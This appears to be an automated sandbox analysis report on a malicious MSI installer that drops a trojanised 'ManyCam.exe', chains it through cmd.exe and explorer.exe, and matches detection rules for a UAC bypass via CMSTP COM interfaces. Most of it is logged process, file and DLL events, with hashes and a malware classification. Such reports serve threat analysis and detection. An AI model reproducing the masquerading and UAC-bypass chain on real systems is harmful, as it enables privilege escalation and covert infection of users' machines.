Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0128EC10	4_2_0128EC10
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120EC60	4_2_0120EC60
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0124AC60	4_2_0124AC60
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0123EC40	4_2_0123EC40
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01212CA0	4_2_01212CA0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120ACB0	4_2_0120ACB0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01214C80	4_2_01214C80
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120ECEC	4_2_0120ECEC
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01252CF0	4_2_01252CF0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01258CC0	4_2_01258CC0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01274CD0	4_2_01274CD0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01218F3D	4_2_01218F3D
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0122EF00	4_2_0122EF00
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01232F06	4_2_01232F06
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_011F2F20	4_2_011F2F20
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0129CFA0	4_2_0129CFA0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120AE70	4_2_0120AE70
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0129EE97	4_2_0129EE97
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120AEEE	4_2_0120AEEE
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0125D160	4_2_0125D160
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120B1A0	4_2_0120B1A0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0129B1D0	4_2_0129B1D0
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120B030	4_2_0120B030
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0123D000	4_2_0123D000
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01299090	4_2_01299090
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01219338	4_2_01219338
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0120B310	4_2_0120B310
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01253340	4_2_01253340
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_011F9380	4_2_011F9380
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_01257390	4_2_01257390
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_011F3240	4_2_011F3240
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0121727E	4_2_0121727E
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_0124D240	4_2_0124D240
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: 4_2_012512A0	4_2_012512A0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Hazan\CrashRpt.dll C28E0AEC124902E948C554436C0EBBEBBA9FC91C906CE2CD887FADA0C64E3386
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Hazan\ManyCam.exe 7C4EB51A737A81C163F95B50EC54518B82FCF91389D0560E855F3E26CEC07282
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Hazan\cv099.dll FAFF6A0745E1720413A028F77583FFF013C3F4682756DC717A0549F1BE3FEFC2

Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: String function: 00416740 appears 60 times
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: String function: 004B77A0 appears 101 times
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: String function: 004B76D0 appears 36 times
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: String function: 0047BCF0 appears 141 times
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: String function: 012369D0 appears 35 times
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Code function: String function: 01236DF0 appears 538 times
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: String function: 00416740 appears 60 times
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: String function: 004B77A0 appears 101 times
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: String function: 004B76D0 appears 36 times
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: String function: 00BD6DF0 appears 441 times
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Code function: String function: 0047BCF0 appears 141 times

Source: CrashRpt.dll.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: CrashRpt.dll.2.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 2.2.ManyCam.exe.41f8430.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.explorer.exe.29625d9.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.ManyCam.exe.41fe830.11.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.cmd.exe.58fa9b9.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.4d5d5b9.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.4d5c9b9.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.ManyCam.exe.41ff430.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.4b2d9b9.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.ManyCam.exe.41f7830.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.explorer.exe.2ce89d9.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.ManyCam.exe.3db5763.11.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.4b2e5b9.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.2b44a08.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.4d178ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.ManyCam.exe.41b9763.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.4ae88ec.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.explorer.exe.2ca390c.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.ManyCam.exe.3dfa830.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.explorer.exe.2ce95d9.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.cmd.exe.58fb5b9.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.explorer.exe.291c90c.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.2b707f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.explorer.exe.29619d9.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.ManyCam.exe.3de6430.11.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.ManyCam.exe.3de5830.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.ManyCam.exe.3dfb430.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 2.2.ManyCam.exe.41b2763.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.ManyCam.exe.3da0763.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.cmd.exe.58b58ec.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: classification engine

Classification label: mal100.expl.evad.winMSI@29/43@1/1

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Code function: 2_2_004B7920 GetLastError,FormatMessageW,GlobalFree,

2_2_004B7920

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Code function: 2_2_004B2100 CoCreateInstance,

2_2_004B2100

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Code function: 2_2_00488A00 FindResourceW,GetLastError,SizeofResource,GetLastError,GetLastError,

2_2_00488A00

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CMLD7D3.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF71CACD3AE9CFDE61.TMP

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: kvW4hZu9JA.msi

Static file information: TRID: Microsoft Windows Installer (60509/1) 88.31%

Source: kvW4hZu9JA.msi

ReversingLabs: Detection: 23%

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\kvW4hZu9JA.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Local\Hazan\ManyCam.exe "C:\Users\user\AppData\Local\Hazan\ManyCam.exe"
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Hazan\ManyCam.exe"
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Process created: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Users\user\AppData\Local\Hazan\ManyCam.exe "C:\Users\user\AppData\Local\Hazan\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Hazan\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Process created: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\System32\pcaui.exe "C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msihnd.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: cximagecrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: cxcore099.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: cv099.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: highgui099.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: crashrpt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Hazan\ManyCam.exe	Section loaded: glu32.dll	Jump to behavior
